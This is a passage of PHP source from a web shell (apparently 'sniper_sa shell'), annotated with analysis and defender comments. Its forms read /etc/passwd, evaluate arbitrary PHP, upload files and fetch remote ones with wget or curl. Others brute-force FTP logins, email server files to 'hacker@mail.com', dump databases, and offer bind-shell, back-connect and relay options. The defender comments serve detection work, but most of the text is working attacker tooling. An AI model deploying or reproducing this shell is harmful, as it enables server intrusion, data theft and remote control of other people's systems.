echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test14_cmd',96,(!empty($_POST['test14_cmd'])?($_POST['test14_cmd']):('../../boot.ini'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&!$unix&&extension_loaded("win32std"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text231'],'id231').$table_up2.div('id231').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test15_cmd',96,(!empty($_POST['test15_cmd'])?($_POST['test15_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&!$unix&&extension_loaded("win32service"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text232'],'id232').$table_up2.div('id232').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test16_cmd',96,(!empty($_POST['test16_cmd'])?($_POST['test16_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&extension_loaded("perl"))
{
// The heading toggles id34 while the panel itself is id233, so the two ids do not match.
echo $fs.$table_up1.div_title($lang[$language.'_text131'],'id34').$table_up2.div('id233').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test17_cmd',96,(!empty($_POST['test17_cmd'])?($_POST['test17_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&!$unix&&extension_loaded("ffi"))
{
// Same mismatch here: the heading toggles id35, the panel is id234.
echo $fs.$table_up1.div_title($lang[$language.'_text132'],'id35').$table_up2.div('id234').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test18_cmd',96,(!empty($_POST['test18_cmd'])?($_POST['test18_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id207').$table_up2.div('id207').$ts;
echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id209').$table_up2.div('id209').$ts;
echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id210').$table_up2.div('id210').$ts;
echo "<table class=table1 width=100% align=center>";
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
echo $table_up1.div_title($lang[$language.'_text211'],'id211').$table_up2.div('id211').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text212']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','php_ini1',10,'php.ini').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','file_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
echo $te.'</div>'.$table_end1.$fe;
$aliases2 = '';
foreach ($aliases as $alias_name=>$alias_cmd)
{
$aliases2 .= "<option>$alias_name</option>";
}
echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode){
echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode && $unix){
echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
echo $te.'</div>'.$table_end1.$fe;
if(!$safe_mode && $unix){
echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
echo $te.'</div>'.$table_end1.$fe;
}
// Renders the code-evaluation form (cmd=php_eval). This panel is not guarded by $safe_mode or
// $unix, so it is always present in the page. The textarea is pre-filled with the previous
// submission or with a default snippet; the posted value is echoed back into the textarea
// without HTML escaping.
// Defender note: the default snippet names was.php and /etc/passwd. Together with the field
// name php_eval these are static strings that content signatures for this file can key on.
echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"was.php\");\r\n//readfile(\"/etc/passwd\");"));
echo "</textarea>";
echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
echo "</div></div></font>";
echo $table_end1.$fe;
if($safe_mode&&$curl_on)
{
echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
echo "<table class=table1 width=100% align=center>";
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&$mssql_on)
{
echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&$unix&&function_exists('mb_send_mail')){
echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&function_exists('imap_list')){
echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&function_exists('imap_body')){
echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
// Renders the file-upload form when the file_uploads ini setting is on: a multipart form with
// a file field "userfile", an optional replacement name ("new_name", enabled by checkbox nf1)
// and the current directory as a hidden field. The handler that stores the upload is outside
// the visible part of the file.
// Defender note: multipart POSTs to a script that is not part of the application, followed by
// new files in the posted "dir", indicate that this form is in use.
if(@ini_get('file_uploads')){
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
echo $te.'</div>'.$table_end1.$fe;
}
// Renders the remote-download form (Unix, no safe_mode): the operator picks one of wget,
// fetch, lynx, links, curl or GET in the "with" selector, gives a remote URL ("rem_file") and
// a local destination ("loc_file"). The handler that runs the chosen tool is outside the
// visible part of the file.
// Defender note: this is the staging path for further tooling. Outbound HTTP from the web
// server started by one of these six binaries under the web-server account is the signal;
// egress filtering for the web tier limits it.
if(!$safe_mode&&$unix){
echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
$arh = $lang[$language.'_text92'];
if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
echo $te.'</div>'.$table_end1.$fe;
if(@function_exists("ftp_connect")){
echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
echo $te."</td>".$fe."</tr></div></table>";
}
// Analysis note (code unchanged): panel "id18" of the decoded web shell, an FTP login-guessing form.
// It is rendered only when $unix is truthy and ftp_connect() exists; the @ hides any warning from the check.
// The handler for cmd=ftp_brute is outside this view; presumably it tries logins against the given
// host:port. Confirm in the command dispatcher.
// Triage hint: a request to this script carrying cmd=ftp_brute together with ftp_server_port indicates
// interactive use of the shell.
if($unix && @function_exists("ftp_connect")){
echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
// The target field is refilled from $_POST['ftp_server_port'] (default "127.0.0.1:21"). in() is defined
// elsewhere, so whether the echoed value is HTML-escaped cannot be confirmed from here.
echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
// $_SERVER['PHP_SELF'] is concatenated into an unquoted href with no escaping; the "?users" view it
// links to is handled outside this view.
echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
// The name argument 'reverse id=reverse' appears to pass an id attribute through in()'s name parameter;
// what the "reverse" option means to the handler is not visible here.
echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
echo $te.'</div>'.$table_end1.$fe;
}
// Analysis note (code unchanged): panel "id19", two side-by-side forms shown when PHP's mail() exists.
// The left form posts cmd=mail (to / from / subj / text). The right form posts cmd=mail_file with a
// loc_file path, which by its name is a way to send a server-side file off the host by e-mail. Both
// handlers are outside this view; confirm there.
// Strings usable for triage or signatures, all literal in this block: "hacker@mail.com",
// "billy@microsoft.com", "hello billy", "mail text here", "file from sniper_sa shell".
if(@function_exists("mail")){
echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
// Each field is refilled from the matching $_POST key, falling back to the hard-coded default.
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
// $_POST['text'] is written between the <textarea> tags with no escaping, so the posted value is
// reflected into the page as raw markup.
echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
// Second column: the "mail a file" form.
echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from sniper_sa shell"))));
// loc_file is prefilled with $dir, which is set outside this view (presumably the shell's current directory).
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
// Radio "compress" with value 'none', followed by $arh, which is built elsewhere (presumably further
// archive-format options; confirm).
echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
echo $te."</td>".$fe."</tr></div></table>";
}
// Analysis note (code unchanged): panel "id20", database access forms, shown when at least one of the
// $mysql_on / $mssql_on / $pg_on / $ora_on flags is set (they are computed outside this view).
// The left form posts cmd=mysql_dump (server, port, login, password, database, table, optional dump
// file name). The right form posts cmd=db_query with free-form SQL. Both handlers are outside this view.
// Triage hint: requests carrying cmd=mysql_dump or cmd=db_query along with db_server / mysql_l / mysql_p
// mean database credentials passed through this script and should be treated as exposed.
if($mysql_on||$mssql_on||$pg_on||$ora_on)
{
// Build the <select name=db> once; it is reused by both forms below.
$select = '<select name=db>';
if($mysql_on) $select .= '<option>MySQL</option>';
if($mssql_on) $select .= '<option>MSSQL</option>';
if($pg_on) $select .= '<option>PostgreSQL</option>';
if($ora_on) $select .= '<option>Oracle</option>';
$select .= '</select>';
echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
// Defaults are "localhost" / "3306" / "root" / "password" / "mysql" / "user"; posted values replace them on redisplay.
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
// The checkbox "dif" plus dif_name (default "dump.sql") presumably make the handler write the dump to
// a file under $dir. Confirm in the handler; if so, look for leftover dump files during cleanup.
echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
// Second column: the arbitrary-query form.
echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
// $_POST['db_query'] is written into the <textarea> with no escaping (default "SHOW DATABASES;").
echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
}
// Analysis note (code unchanged): panel "id21", three network forms, shown only when $safe_mode is
// false and $unix is truthy.
// Going by the field names and defaults, the columns are:
//   1) port + bind_pass + use (Perl/C)                    -> a password-protected listener on the host
//   2) ip + port + use (Perl/C)                           -> an outbound connection back to the operator
//   3) local_port + remote_host + remote_port + datapipe  -> a TCP relay through the host
// None of these forms has a hidden cmd field in the visible lines, so the dispatcher presumably keys on
// the field names. The handlers and helper programs are outside this view; confirm there.
// Defender notes: the literals 'SnIpEr', '9999', 'irc.dalnet.ru' and '6667' in this block are useful
// signature strings. On a suspected host, check for perl or compiler child processes of the web server
// account, unexpected listening sockets and outbound connections from it. Egress filtering for the web
// server account limits what these forms can achieve.
if(!$safe_mode&&$unix){
echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
// Column 1: hard-coded defaults for port ('9999') and bind_pass ('SnIpEr').
echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'9999'));
echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'SnIpEr'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
// Column 2: ip is prefilled with getenv('REMOTE_ADDR'), i.e. the address of whoever is viewing the
// page, falling back to "127.0.0.1" when that is empty.
echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'80'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
// Column 3: relay settings; the option labels name datapipe.pl / datapipe.c, while the submitted
// values are still "Perl" / "C".
echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'80'));
echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
echo $te."</td>".$fe."</tr></div></table>";
}
// Analysis note (code unchanged): a second panel that reuses the title key '_text81' and the div id
// 'id21' of the preceding network panel, so the page carries a duplicate id when both are rendered.
